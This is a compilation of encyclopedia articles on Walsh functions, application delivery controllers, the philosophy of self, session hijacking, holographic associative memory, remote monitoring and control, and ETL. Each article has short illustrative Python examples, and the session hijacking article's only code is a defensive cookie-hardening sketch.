The term Fermion in the name of the system is explained by the fact that the enveloping operator space, the so-called hyperfinite type II factor ℛ, may be viewed as the space of observables of a system of countably many distinct spin-1/2 fermions. Each Rademacher operator acts on one particular fermion coordinate only, and there it is a Pauli matrix. It may be identified with the observable measuring the spin component of that fermion along one of the axes {x, y, z} in spin space. Thus, a Walsh operator measures the spin of a subset of fermions, each along its own axis.
Fix a sequence α = (α_1, α_2, ...) of integers with α_k ≥ 2, k = 1, 2, …, and let 𝔾 = 𝔾_α = ∏_{k=1}^∞ ℤ/α_kℤ, endowed with the product topology and the normalized Haar measure. Define A_0 = 1 and A_k = α_1 α_2 ⋯ α_{k−1}. Each x ∈ 𝔾 can be associated with the real number
|x| = ∑_{k=1}^∞ x_k / A_{k+1}.
This correspondence is a modulo zero isomorphism between 𝔾 and the unit interval. It also defines a norm which generates the topology of 𝔾. For k = 1, 2, …, let ρ_k : 𝔾 → ℂ, where
ρ_k(x) = exp(2πi x_k / α_k).
The set {ρ_k} is called the generalized Rademacher system. The Vilenkin system is the group 𝔾̂ = ∐_{k=1}^∞ ℤ/α_kℤ of (complex-valued) characters of 𝔾, which are all finite products of {ρ_k}. For each non-negative integer n there is a unique sequence n_0, n_1, … such that 0 ≤ n_k < α_{k+1}, k = 0, 1, 2, …, and
n = ∑_{k=0}^∞ n_k A_{k+1}.
Then 𝔾̂ = {χ_n | n = 0, 1, …}, where
χ_n = ∏_{k=0}^∞ ρ_{k+1}^{n_k}.
In particular, if α_k = 2, k = 1, 2, …, then 𝔾 is the Cantor group and {χ_n | n = 0, 1, …} is the (real-valued) Walsh–Paley system.
The Vilenkin system is a complete orthonormal system on 𝔾 and forms a Schauder basis in L^p(𝔾, ℂ), 1 < p < ∞.[8]
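The orthonormality of the characters can be checked numerically on a finite truncation of the group; the sequence (2, 3, 4) below is an arbitrary choice for the demonstration:

```python
import cmath
import itertools

alphas = (2, 3, 4)                     # a finite truncation of the sequence alpha

def rho(k, x):
    # Generalized Rademacher rho_k depends only on the k-th coordinate of x
    return cmath.exp(2j * cmath.pi * x[k - 1] / alphas[k - 1])

def chi(digits, x):
    # A Vilenkin character: a finite product of powers of the rho_k,
    # with the exponents given by the digit sequence n_0, n_1, ...
    val = 1 + 0j
    for k, nk in enumerate(digits):
        val *= rho(k + 1, x) ** nk
    return val

pts = list(itertools.product(*(range(a) for a in alphas)))

# Distinct characters are orthogonal under the normalized Haar (counting) measure,
# and each character has norm one
inner = sum(chi((1, 2, 0), x) * chi((1, 1, 0), x).conjugate() for x in pts) / len(pts)
assert abs(inner) < 1e-12
norm = sum(abs(chi((1, 2, 3), x)) ** 2 for x in pts) / len(pts)
assert abs(norm - 1) < 1e-12
```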
Nonlinear phase extensions of the discrete Walsh–Hadamard transform have been developed. It was shown that nonlinear phase basis functions with improved cross-correlation properties significantly outperform the traditional Walsh codes in code-division multiple access (CDMA) communications.[9]
Applications of the Walsh functions can be found wherever digit representations are used, including speech recognition, medical and biological image processing, and digital holography.
For example, the fast Walsh–Hadamard transform (FWHT) may be used in the analysis of digital quasi-Monte Carlo methods. In radio astronomy, Walsh functions can help reduce the effects of electrical crosstalk between antenna signals. They are also used in passive LCD panels as X and Y binary driving waveforms, where the autocorrelation between X and Y can be made minimal for pixels that are off.
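As an illustration, the fast Walsh–Hadamard transform fits in a few lines; this sketch uses the Hadamard (natural) ordering rather than the Walsh–Paley sequency ordering:

```python
def fwht(a):
    # Butterfly passes over a list whose length is a power of two: O(n log n)
    a = list(a)
    h = 1
    while h < len(a):
        for i in range(0, len(a), 2 * h):
            for j in range(i, i + h):
                a[j], a[j + h] = a[j] + a[j + h], a[j] - a[j + h]
        h *= 2
    return a

v = [1, 0, 1, 0, 0, 1, 1, 0]
w = fwht(v)
assert w[0] == sum(v)                  # the first output is the sum of the inputs
assert fwht(w) == [8 * x for x in v]   # applying the transform twice scales by n
```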
|
https://en.wikipedia.org/wiki/Walsh_function
|
An application delivery controller (ADC) is a computer network device in a datacenter, often part of an application delivery network (ADN), that helps perform common tasks, such as those done by web accelerators to remove load from the web servers themselves. Many also provide load balancing. ADCs are often placed in the DMZ, between the outer firewall or router and a web farm.[citation needed]
An Application Delivery Controller (ADC) is a type of server that provides a variety of services designed to optimize the distribution of load being handled by backend content servers. An ADC directs web request traffic to optimal data sources in order to remove unnecessary load from web servers. To accomplish this, an ADC includes many OSI layer 3-7 services, including load-balancing.
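One representative ADC service, simple round-robin load balancing, can be sketched in a few lines; the backend addresses and class name below are invented for illustration:

```python
import itertools

class RoundRobinBalancer:
    # Minimal sketch of one ADC duty: spreading incoming requests over backends.
    # A real ADC would layer caching, compression, SSL offload, etc. on top.
    def __init__(self, backends):
        self._cycle = itertools.cycle(backends)

    def route(self, request):
        # Pick the next backend in rotation for this request
        return next(self._cycle)

lb = RoundRobinBalancer(["10.0.0.1", "10.0.0.2", "10.0.0.3"])
targets = [lb.route("GET /index.html") for _ in range(6)]
assert targets == ["10.0.0.1", "10.0.0.2", "10.0.0.3"] * 2
```

Production balancers usually add health checks and weighting, but the rotation above is the core of the round-robin policy.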
ADCs are intended to be deployed within the DMZ of a computer server cluster hosting web applications and/or services. In this sense, an ADC can be envisioned as a drop-in load balancer replacement. But that is where the similarities end. When an ADC receives a web request from an external host, it enacts the following process (assuming all features exist and are enabled):
Features commonly found in ADCs include:
In the context of Telco infrastructure, an ADC could provide access control services for a Gi-LAN area.
Starting around 2004, first-generation ADCs offered simple application acceleration and load balancing.[citation needed]
In 2006, ADCs began to mature, featuring advanced application services such as compression, caching, connection multiplexing, traffic shaping, application layer security, SSL offload, and content switching, combined with services like server load balancing in an integrated services framework that optimized and secured business-critical application flows.[citation needed]
By 2007, application acceleration products were available from many companies.[1]
Until leaving the market in 2012, Cisco Systems offered application delivery controllers. Market leaders like F5 Networks, Radware, and Citrix had been gaining market share from Cisco in previous years.[2]
The ADC market segment became fragmented into two general areas: 1) general network optimization; and 2) application/framework-specific optimization. Both types of devices improve performance, but the latter is usually more aware of optimization strategies that work best with a particular application framework, focusing on ASP.NET or AJAX applications, for example.[3][4]
|
https://en.wikipedia.org/wiki/Application_delivery_controller
|
In philosophy, the self is an individual's own being, knowledge, and values, and the relationship between these attributes.
The first-person perspective distinguishes selfhood from personal identity. Whereas "identity" is (literally) sameness[1] and may involve categorization and labeling,[2] selfhood implies a first-person perspective and suggests potential uniqueness. Conversely, "person" is used as a third-person reference. Personal identity can be impaired in late-stage Alzheimer's disease and in other neurodegenerative diseases. Finally, the self is distinguishable from "others". Including the distinction between sameness and otherness, the self versus other is a research topic in contemporary philosophy[3] and contemporary phenomenology (see also psychological phenomenology), psychology, psychiatry, neurology, and neuroscience.
Although subjective experience is central to selfhood, the privacy of this experience is only one of many problems in the philosophy of self and the scientific study of consciousness.
The psychology of self is the study of either the cognitive and affective representation of one's identity or the subject of experience. The earliest formulation of the self in modern psychology draws the distinction between two elements, I and me: the self as I is the subjective knower, while the self as Me is the subject that is known.[4] Current views of the self in psychology position the self as playing an integral part in human motivation, cognition, affect, and social identity.[5] The self, following the ideas of John Locke, has been seen as a product of episodic memory,[6] but research on people with amnesia reveals that they have a coherent sense of self based on preserved conceptual autobiographical knowledge.[7] Hence, it is possible to correlate cognitive and affective experiences of self with neural processes. A goal of this ongoing research is to provide grounding insight into the elements of which the complex multiple situated selves of human identity are composed.
What the Freudian tradition has subjectively called a "sense of self" is, for Jungian analytic psychology, one's identity as lodged in the persona or ego, which is subject to change in maturation. Carl Jung distinguished: "The self is not only the center but also the whole circumference which embraces both conscious and unconscious; it is the center of this totality...".[8] The Self in Jungian psychology is "the archetype of wholeness and the regulating center of the psyche ... a transpersonal power that transcends the ego."[9][10] As a Jungian archetype, it cannot be seen directly, but by ongoing individuating maturation and analytic observation, it can be experienced objectively by its cohesive wholeness-making factor.[11]
Meanwhile, self psychology is a set of psychotherapeutic principles and techniques established by the Austrian-born American psychoanalyst Heinz Kohut upon the foundation of the psychoanalytic method developed by Freud, and is specifically focused on the subjectivity of experience, which, according to self psychology, is mediated by a psychological structure called the self.[12] Examples of psychiatric conditions where such "sameness" may become broken include depersonalization, which sometimes occurs in schizophrenia, where the self appears different from the subject.
The "disorders of the self" have also been extensively studied by psychiatrists.[13]
For example, facial and pattern recognition take large amounts of brain processing capacity, but pareidolia cannot explain many constructs of self in cases of disorder, such as schizophrenia or schizoaffective disorder.
One's sense of self can also change upon becoming part of a stigmatized group. According to Cox, Abramson, Devine, and Hollon (2012), if an individual holds prejudice against a certain group, such as the elderly, and later becomes part of that group, this prejudice can be turned inward, causing depression.[14]
The philosophy of a disordered self, such as in schizophrenia, is described in terms of what the psychiatrist understands to be actual events in terms of neuron excitation but delusions nonetheless, and which the schizoaffective or schizophrenic person also believes to be actual events in terms of essential being. PET scans have shown that auditory stimulation is processed in certain areas of the brain, and imagined similar events are processed in adjacent areas, but hallucinations are processed in the same areas as actual stimulation. In such cases, external influences may be the source of consciousness, and the person may or may not be responsible for "sharing" in the mind's process, or the events which occur, such as visions and auditory stimuli, may persist and be repeated often over hours, days, months or years—and the afflicted person may believe themselves to be in a state of rapture or possession.
Two areas of the brain that are important in retrieving self-knowledge are the medial prefrontal cortex and the medial posterior parietal cortex.[15] The posterior cingulate cortex, the anterior cingulate cortex, and the medial prefrontal cortex are thought to combine to provide humans with the ability to self-reflect. The insular cortex is also thought to be involved in the process of self-reference.[16]
Culture consists of explicit and implicit patterns of historically derived and selected ideas and their embodiment in institutions, cognitive and social practices, and artifacts. Cultural systems may, on the one hand, be considered as products of action, and on the other, as conditioning elements of further action.[17] The way individuals construct themselves may be different due to their culture.[18]
Hazel Rose Markus and Shinobu Kitayama's theory of the interdependent self hypothesizes that representations of the self in human cultures fall on a continuum from independent to interdependent. The independent self is supposed to be egoistic, unique, separated from the various contexts, critical in judgment, and prone to self-expression. The interdependent self is supposed to be altruistic, similar to others, flexible according to context, conformist, and unlikely to express opinions that would disturb the harmony of his or her group of belonging.[19] However, this theory has been criticized by other sociologists, including David Matsumoto,[20] for being based on popular stereotypes and myths about different cultures rather than on rigorous scientific research. A 2016 study[21] of 10,203 participants from 55 cultural groups also failed to support the postulated series of causal links between culture and self-construals, finding instead that correlations between traits varied across cultures and did not match Markus and Kitayama's characterizations of "independent" or "interdependent" selves.[22]
The philosophy of self seeks to describe essential qualities that constitute a person's uniqueness or a person's essential being. There have been various approaches to defining these qualities. The self can be considered as the source of consciousness, the agent responsible for an individual's thoughts and actions, or the substantial nature of a person which endures and unifies consciousness over time.
The self has a particular prominence in the thought of René Descartes (1596–1650).[23] In addition to the writings of Emmanuel Levinas (1906–1995) on "otherness", the distinction between "you" and "me" has been further elaborated in Martin Buber's 1923 philosophical work Ich und Du.
In philosophy, the problem of personal identity[24] is concerned with how one is able to identify a single person over a time interval, dealing with such questions as "What makes it true that a person at one time is the same thing as a person at another time?" or "What kinds of things are we persons?"
A question related to the problem of personal identity is Benj Hellie's vertiginous question. The vertiginous question asks why, of all the subjects of experience out there, this one—the one corresponding to the human being referred to as Benj Hellie—is the one whose experiences are live? (The reader is supposed to substitute their own case for Hellie's.)[25] Hellie's argument is closely related to Caspar Hare's theories of egocentric presentism and perspectival realism, of which several other philosophers have written reviews.[26] Similar questions are also asked repeatedly by J. J. Valberg in justifying his horizonal view of the self,[27] and by Thomas Nagel in The View from Nowhere.[28][29] Tim S. Roberts refers to the question of why a particular organism, out of all the organisms that happen to exist, happens to be you as the "Even Harder Problem of Consciousness".[30]
Open individualism is a view in the philosophy of self according to which there exists only one numerically identical subject, who is everyone at all times, in the past, present and future.[31]: 617 It is a theoretical solution to the question of personal identity, being contrasted with "empty individualism", the view that personal identities correspond to a fixed pattern that instantaneously disappears with the passage of time, and "closed individualism", the common view that personal identities are particular to subjects and yet survive over time.[31]: xxii
Open individualism is related to the concept of anattā in Buddhist philosophy. In Buddhism, the term anattā (Pali: 𑀅𑀦𑀢𑁆𑀢𑀸) or anātman (Sanskrit: अनात्मन्) is the doctrine of "non-self" – that no unchanging, permanent self or essence can be found in any phenomenon. While often interpreted as a doctrine denying the existence of a self, anatman is more accurately described as a strategy to attain non-attachment by recognizing everything as impermanent, while staying silent on the ultimate existence of an unchanging essence.[32][33] In contrast, dominant schools of Hinduism assert the existence of Ātman as pure awareness or witness-consciousness,[34][35][36] "reify[ing] consciousness as an eternal self."[37]
One thought experiment in the philosophy of personal identity is the teletransportation paradox. It deals with whether the concept of one's future self is a coherent concept. The thought experiment was formulated by Derek Parfit in his 1984 book Reasons and Persons.[38] Parfit and others consider a hypothetical "teletransporter", a machine that puts you to sleep, records your molecular composition, breaks you down into atoms, and relays the recording to Mars at the speed of light. On Mars, another machine re-creates you (from local stores of carbon, hydrogen, and so on), each atom in exactly the same relative position. Parfit poses the question of whether or not the teletransporter is actually a method of travel, or if it simply kills and makes an exact replica of the user.[39] Then the teleporter is upgraded: the teletransporter on Earth is modified to not destroy the person who enters it, but instead to simply make infinite replicas, all of whom would claim to remember entering the teletransporter on Earth in the first place. Using thought experiments such as these, Parfit argues that any criteria we attempt to use to determine sameness of person will be lacking, because there is no further fact. What matters, to Parfit, is simply "Relation R": psychological connectedness, including memory, personality, and so on.[40]
Religious views on the Self vary widely. The Self is a complex and core subject in many forms of spirituality. Two types of Self are commonly considered—the Self that is the ego, also called the learned, superficial Self of mind and body, an egoic creation, and the Self which is sometimes called the "True Self", the "Observing Self", or the "Witness".[41] In Hinduism, the Ātman (Self), despite being experienced as an individual, is actually a representation of the unified transcendent reality, Brahman.[42] Our experience of reality does not match the nature of Brahman due to māyā.
One description of spirituality is the Self's search for "ultimate meaning" through an independent comprehension of the sacred. Another definition of spiritual identity is: "A persistent sense of Self that addresses ultimate questions about the nature, purpose, and meaning of life, resulting in behaviors that are consonant with the individual's core values. Spiritual identity appears when the symbolic religious and spiritual value of a culture is found by individuals in the setting of their own life. There can be different types of spiritual Self because it is determined by one's life and experiences."[43]
Human beings have a Self—that is, they are able to look back on themselves as both subjects and objects in the universe. Ultimately, this brings questions about who we are and the nature of our own importance.[44] Traditions such as Buddhism see attachment to Self as an illusion that serves as the main cause of suffering and unhappiness.[45]
|
https://en.wikipedia.org/wiki/Self
|
In computer science, session hijacking, sometimes also known as cookie hijacking, is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many websites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). After successfully stealing appropriate session cookies, an adversary might use the Pass the Cookie technique to perform session hijacking. Cookie hijacking is commonly used against client authentication on the internet. Modern web browsers use cookie protection mechanisms to protect the web from being attacked.[1]
A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.
If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command but can never see the response. However, a common command would be to set a password allowing access from elsewhere on the net.
An attacker can also be "inline" between A and C, using a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack".
HTTP protocol versions 0.8 and 0.9 lacked cookies and other features necessary for session hijacking. Version 0.9beta of Mosaic Netscape, released on October 13, 1994, supported cookies.
Early versions of HTTP 1.0 did have some security weaknesses relating to session hijacking, but they were difficult to exploit due to the vagaries of most early HTTP 1.0 servers and browsers. As HTTP 1.0 has been designated as a fallback for HTTP 1.1 since the early 2000s, and as HTTP 1.0 servers are all essentially HTTP 1.1 servers, the session hijacking problem has evolved into a nearly permanent security risk.[2][failed verification]
The introduction of supercookies and other features with the modernized HTTP 1.1 has allowed the hijacking problem to become an ongoing security problem. Webserver and browser state-machine standardization has contributed to this ongoing security problem.
There are four main methods used to perpetrate a session hijack. These are:
After successfully acquiring appropriate session cookies, an adversary would inject the session cookie into their browser to impersonate the victim user on the website from which the session cookie was stolen.[5]
Attackers often rely on specialized tools to execute session hijacking attacks. One such tool is Firesheep, a Firefox extension introduced in October 2010. Firesheep demonstrated session hijacking vulnerabilities in unsecured networks by capturing unencrypted cookies from popular websites, allowing users to take over active sessions of others on the same network. The tool worked by displaying potential targets in a sidebar, enabling session access without password theft.[6]
Another widely used tool is Wireshark, a network protocol analyzer that allows attackers to monitor and intercept data packets on unsecured networks. If a website does not encrypt its session cookies or authentication tokens, attackers can extract them and use them to gain unauthorized access to a victim's account.[7]
Firesheep, a Firefox extension introduced in October 2010, demonstrated session hijacking vulnerabilities in unsecured networks. It captured unencrypted cookies from popular websites, allowing users to take over active sessions of others on the same network. The tool worked by displaying potential targets in a sidebar, enabling session access without password theft. The websites supported included Facebook, Twitter, Flickr, Amazon, Windows Live and Google, with the ability to use scripts to add other websites.[8] Only months later, Facebook and Twitter responded by offering (and later requiring) HTTP Secure throughout.[9][10]
DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session ID from these packets in order to reuse them. DroidSheep can capture sessions using the libpcap library and supports open (unencrypted) networks, WEP-encrypted networks, and WPA/WPA2-encrypted networks (PSK only). This software uses libpcap and arpspoof.[11][12] The apk was made available on Google Play but it has been taken down by Google.
CookieCadger is a graphical Java app that automates sidejacking and replay of HTTP requests, to help identify information leakage from applications that use unencrypted GET requests. It is a cross-platform open-source utility based on the Wireshark suite which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis. Cookie Cadger has been used to highlight the weaknesses of youth team sharing sites such as Shutterfly (used by the AYSO soccer league) and TeamSnap.[13]
CookieMonster is a man-in-the-middle exploit where a third party can gain HTTPS cookie data when the "Encrypted Sessions Only" property is not properly set. This could allow access to sites with sensitive personal or financial information. In 2008, this could affect major websites, including Gmail, Google Docs, eBay, Netflix, CapitalOne, and Expedia.[14]
It is a Python-based tool developed by security researcher Mike Perry. Perry originally announced the vulnerability exploited by CookieMonster on BugTraq in 2007. A year later, he demonstrated CookieMonster as a proof-of-concept tool at Defcon 16.[15][16][17][18][19][20][21][22]
Methods to prevent session hijacking include:
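One widely deployed mitigation is marking session cookies so browsers restrict how they are transmitted. A sketch with Python's standard library (the cookie name and token value are hypothetical):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "opaque-random-token"   # hypothetical session token
cookie["sessionid"]["secure"] = True          # send only over HTTPS
cookie["sessionid"]["httponly"] = True        # hide from JavaScript, limiting XSS theft
cookie["sessionid"]["samesite"] = "Strict"    # limit cross-site sending

# The serialized Set-Cookie value carries the protective attributes
header = cookie["sessionid"].OutputString()
```

Secure prevents the cookie leaking over plain HTTP (the weakness Firesheep exploited), while HttpOnly and SameSite narrow the avenues for script-based and cross-site theft.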
|
https://en.wikipedia.org/wiki/Cookiemonster_attack
|
For holographic data storage, holographic associative memory (HAM) is an information storage and retrieval system based on the principles of holography. Holograms are made by using two beams of light, called a "reference beam" and an "object beam". They produce a pattern on the film that contains them both. Afterwards, by reproducing the reference beam, the hologram recreates a visual image of the original object. In theory, one could use the object beam to do the same thing: reproduce the original reference beam. In HAM, the pieces of information act like the two beams. Each can be used to retrieve the other from the pattern. It can be thought of as an artificial neural network which mimics the way the brain uses information. The information is presented in abstract form by a complex vector which may be expressed directly by a waveform possessing frequency and magnitude. This waveform is analogous to the electrochemical impulses believed to transmit information between biological neuron cells.
HAM is part of the family of analog, correlation-based, associative, stimulus-response memories, where information is mapped onto the phase orientation of complex numbers. It can be considered as a complex-valued artificial neural network. The holographic associative memory exhibits some remarkable characteristics. Holographs have been shown to be effective for associative memory tasks, generalization, and pattern recognition with changeable attention. The ability of dynamic search localization is central to natural memory.[1] For example, in visual perception, humans always tend to focus on some specific objects in a pattern. Humans can effortlessly change the focus from object to object without requiring relearning. HAM provides a computational model which can mimic this ability by creating a representation for focus. At the heart of this memory lies a novel bi-modal representation of pattern and a hologram-like complex spherical weight state-space. Besides the usual advantages of associative computing, this technique also has excellent potential for fast optical realization because the underlying hyper-spherical computations can be naturally implemented with optical computation.
It is based on the principle of information storage in the form of stimulus-response patterns, where information is represented by the phase angle orientations of complex numbers on a Riemann surface.[2] A very large number of stimulus-response patterns may be superimposed or "enfolded" on a single neural element. Stimulus-response associations may be both encoded and decoded in one non-iterative transformation. The mathematical basis requires no optimization of parameters or error backpropagation, unlike connectionist neural networks. The principal requirement is for stimulus patterns to be made symmetric or orthogonal in the complex domain. HAM typically employs sigmoid pre-processing, where raw inputs are orthogonalized and converted to Gaussian distributions.
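A toy numerical sketch of this phase-based encode/decode scheme, storing a single stimulus-response pair (the dimensions and phase values are arbitrary choices for the demo, and the simplified correlation encoding stands in for a full HAM):

```python
import cmath
import random

random.seed(1)
n = 64

# Stimulus and response encoded purely in the phase angles of unit complex numbers
stim = [cmath.exp(1j * random.uniform(0, 2 * cmath.pi)) for _ in range(n)]
resp = [cmath.exp(1j * a) for a in (0.5, 1.5, 2.5)]

# Encode: one correlation ("holographic") superposition, with no iterative training;
# further pairs could be added onto the same matrix W
W = [[s.conjugate() * r / n for r in resp] for s in stim]

# Decode: a single non-iterative transform recovers the response phases
out = [sum(stim[i] * W[i][j] for i in range(n)) for j in range(len(resp))]
assert all(abs(cmath.phase(o) - p) < 1e-9 for o, p in zip(out, (0.5, 1.5, 2.5)))
```

With several superimposed pairs the recall is approximate rather than exact, the crosstalk shrinking as the stimulus dimension n grows.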
|
https://en.wikipedia.org/wiki/Holographic_associative_memory
|
Remote monitoring and control(M&C) systems are designed to control large or complex facilities such as factories, power plants, network operations centers, airports, and spacecraft, with some degree of automation.
M&C systems may receive data from sensors, telemetry streams, user inputs, and pre-programmed procedures. The software may send telecommands to actuators, computer systems, or other devices.
M&C systems may perform closed-loop control.
Once limited to SCADA in industrial settings, remote monitoring and control is now applied in numerous fields, including:
While this field overlaps with machine-to-machine communications, the two are not completely identical.
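The closed-loop control mentioned above can be sketched as a minimal on/off (bang-bang) controller: read a sensor, compare against a setpoint, and issue a telecommand to an actuator. The setpoint, hysteresis band, and toy plant dynamics below are purely illustrative.

```python
def thermostat_step(temp, setpoint=20.0, hysteresis=0.5, heater_on=False):
    """One iteration of a bang-bang control loop:
    read sensor -> compare to setpoint -> command actuator."""
    if temp < setpoint - hysteresis:
        heater_on = True          # telecommand: switch heater on
    elif temp > setpoint + hysteresis:
        heater_on = False         # telecommand: switch heater off
    return heater_on

# Simulate a few monitoring cycles against a toy plant
temp, heater = 18.0, False
for _ in range(10):
    heater = thermostat_step(temp, heater_on=heater)
    temp += 0.4 if heater else -0.2   # invented plant dynamics
print(round(temp, 1))
```

The hysteresis band keeps the actuator from chattering on and off around the setpoint, a standard concern in M&C loops.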
|
https://en.wikipedia.org/wiki/Remote_monitoring_and_control
|
Extract, transform, load(ETL) is a three-phase computing process in which data is extracted from an input source, transformed (including cleaning), and loaded into an output data container. The data can be collected from one or more sources, and it can also be output to one or more destinations. ETL processing is typically executed using software applications, but it can also be done manually by system operators. ETL software typically automates the entire process and can be run manually or on recurring schedules, either as single jobs or aggregated into a batch of jobs.
A properly designed ETL system extracts data from source systems, enforces data-type and data-validity standards, and ensures the data conforms structurally to the requirements of the output. Some ETL systems can also deliver data in a presentation-ready format so that application developers can build applications and end users can make decisions.[1]
The ETL process is often used in data warehousing.[2] ETL systems commonly integrate data from multiple applications (systems), typically developed and supported by different vendors or hosted on separate computer hardware. The separate systems containing the original data are frequently managed and operated by different stakeholders. For example, a cost accounting system may combine data from payroll, sales, and purchasing.
Data extraction involves extracting data from homogeneous or heterogeneous sources; data transformation processes the data by cleaning it and transforming it into a proper storage format/structure for the purposes of querying and analysis; finally, data loading describes the insertion of data into the final target database, such as an operational data store, a data mart, a data lake, or a data warehouse.[3][4]
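The three phases can be sketched end to end with standard-library tools; the CSV feed, table name, and cleaning rules here are hypothetical, and an in-memory SQLite database stands in for the target warehouse.

```python
import csv
import io
import sqlite3

# Hypothetical CSV feed standing in for the source system
raw = io.StringIO("id,name,amount\n1, Alice ,10.5\n2,Bob,\n")

# Extract: pull the rows out of the source format
rows = list(csv.DictReader(raw))

# Transform: trim whitespace, default missing amounts to 0.0
cleaned = [(int(r["id"]), r["name"].strip(), float(r["amount"] or 0.0))
           for r in rows]

# Load: insert into the target store (an in-memory "warehouse" here)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE sales (id INTEGER PRIMARY KEY, name TEXT, amount REAL)")
db.executemany("INSERT INTO sales VALUES (?, ?, ?)", cleaned)
print(db.execute("SELECT name, amount FROM sales").fetchall())
# → [('Alice', 10.5), ('Bob', 0.0)]
```

Real pipelines add validation, logging, and scheduling around these three steps, but the extract/transform/load seams stay the same.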
ETL processing involves extracting the data from the source system(s). In many cases, this is the most important aspect of ETL, since extracting data correctly sets the stage for the success of subsequent processes. Most data-warehousing projects combine data from different source systems. Each separate system may also use a different data organization and/or format. Common data-source formats include relational databases, flat-file databases, XML, and JSON, but sources may also include non-relational database structures such as IBM Information Management System, other data structures such as Virtual Storage Access Method (VSAM) or Indexed Sequential Access Method (ISAM), or even formats fetched from outside sources by means such as a web crawler or data scraping. Streaming the extracted data source and loading it on-the-fly into the destination database is another way of performing ETL when no intermediate data storage is required.
An intrinsic part of the extraction involves data validation to confirm whether the data pulled from the sources has the correct/expected values in a given domain (such as a pattern/default or a list of values). If the data fails the validation rules, it is rejected entirely or in part. The rejected data is ideally reported back to the source system for further analysis to identify and rectify the incorrect records, or for data wrangling.
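A validation step of the kind described might look like the following sketch; the rules (an SSN-like pattern and a country allow-list) are invented for illustration, and rejected records carry their failure reasons back for analysis.

```python
import re

VALID_SSN = re.compile(r"^\d{3}-\d{2}-\d{4}$")
ALLOWED_COUNTRIES = {"US", "CA", "MX"}

def validate(record):
    """Return the list of validation failures for one record."""
    errors = []
    if not VALID_SSN.match(record.get("ssn", "")):
        errors.append("ssn: bad pattern")
    if record.get("country") not in ALLOWED_COUNTRIES:
        errors.append("country: not in allowed list")
    return errors

batch = [{"ssn": "123-45-6789", "country": "US"},
         {"ssn": "oops", "country": "ZZ"}]

# Records failing any rule are rejected and reported with reasons
accepted = [r for r in batch if not validate(r)]
rejected = [(r, validate(r)) for r in batch if validate(r)]
print(len(accepted), len(rejected))  # → 1 1
```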
In the data transformation stage, a series of rules or functions are applied to the extracted data in order to prepare it for loading into the end target.
An important function of transformation is data cleansing, which aims to pass only "proper" data to the target. The challenge when different systems interact lies in getting the relevant systems to interface and communicate: character sets that are available in one system may not be available in others.
In other cases, one or more of the following transformation types may be required to meet the business and technical needs of the server or data warehouse:
The load phase loads the data into the end target, which can be any data store, including a simple delimited flat file or a data warehouse. Depending on the requirements of the organization, this process varies widely. Some data warehouses may overwrite existing information with cumulative information; updating extracted data is frequently done on a daily, weekly, or monthly basis. Other data warehouses (or even other parts of the same data warehouse) may add new data in a historical form at regular intervals, for example, hourly. To understand this, consider a data warehouse that is required to maintain sales records for the last year: it overwrites any data older than a year with newer data, but entries within the one-year window are recorded historically. The timing and scope of replacing or appending are strategic design choices dependent on the time available and the business needs. More complex systems can maintain a history and audit trail of all changes to the data loaded into the data warehouse.
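The overwrite-versus-append distinction above can be sketched with two target tables; table and column names are illustrative, and the upsert syntax assumes SQLite 3.24 or newer (as shipped with current Python).

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE sales_current (key TEXT PRIMARY KEY, amount REAL)")
db.execute("CREATE TABLE sales_history (key TEXT, amount REAL, loaded_at TEXT)")

def load(key, amount, ts):
    # Overwrite strategy: keep only the latest value per key
    db.execute("INSERT INTO sales_current VALUES (?, ?) "
               "ON CONFLICT(key) DO UPDATE SET amount = excluded.amount",
               (key, amount))
    # Append strategy: keep every load as a historical row
    db.execute("INSERT INTO sales_history VALUES (?, ?, ?)", (key, amount, ts))

load("A", 10.0, "2024-01-01")
load("A", 12.0, "2024-02-01")
print(db.execute("SELECT amount FROM sales_current").fetchall())      # → [(12.0,)]
print(db.execute("SELECT COUNT(*) FROM sales_history").fetchone()[0]) # → 2
```

The current table answers "what is the value now", while the history table supports the audit-trail style of warehouse described above.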
As the load phase interacts with a database, the constraints defined in the database schema, as well as in triggers activated upon data load, apply (for example, uniqueness, referential integrity, mandatory fields), and these also contribute to the overall data-quality performance of the ETL process.
A real-life ETL cycle may consist of additional execution steps, for example:
ETL processes can involve considerable complexity, and significant operational problems can occur with improperly designed ETL systems.
The range of data values or data quality in an operational system may exceed the expectations of designers at the time validation and transformation rules are specified. Data profiling of a source during data analysis can identify the data conditions that must be managed by transformation rule specifications, leading to an amendment of the validation rules explicitly and implicitly implemented in the ETL process.
Data warehouses are typically assembled from a variety of data sources with different formats and purposes. As such, ETL is a key process to bring all the data together in a standard, homogeneous environment.
Design analysis[5] should establish the scalability of an ETL system across the lifetime of its usage, including an understanding of the volumes of data that must be processed within service level agreements. The time available to extract from source systems may change, which may mean the same amount of data has to be processed in less time. Some ETL systems have to scale to process terabytes of data when updating data warehouses holding tens of terabytes. Increasing volumes of data may require designs that can scale from daily batch to multiple-day micro-batch to integration with message queues or real-time change data capture for continuous transformation and update.
Unique keys play an important part in all relational databases, as they tie everything together. A unique key is a column that identifies a given entity, whereas a foreign key is a column in another table that refers to a primary key. Keys can comprise several columns, in which case they are composite keys. In many cases, the primary key is an auto-generated integer that has no meaning for the business entity being represented but exists solely for the purposes of the relational database, commonly referred to as a surrogate key.
As there is usually more than one data source being loaded into the warehouse, the keys are an important concern to address. For example: customers might be represented in several data sources, with their Social Security number as the primary key in one source, their phone number in another, and a surrogate key in the third. Yet a data warehouse may require the consolidation of all the customer information into one dimension.
A recommended way to deal with the concern involves adding a warehouse surrogate key, which is used as a foreign key from the fact table.[6]
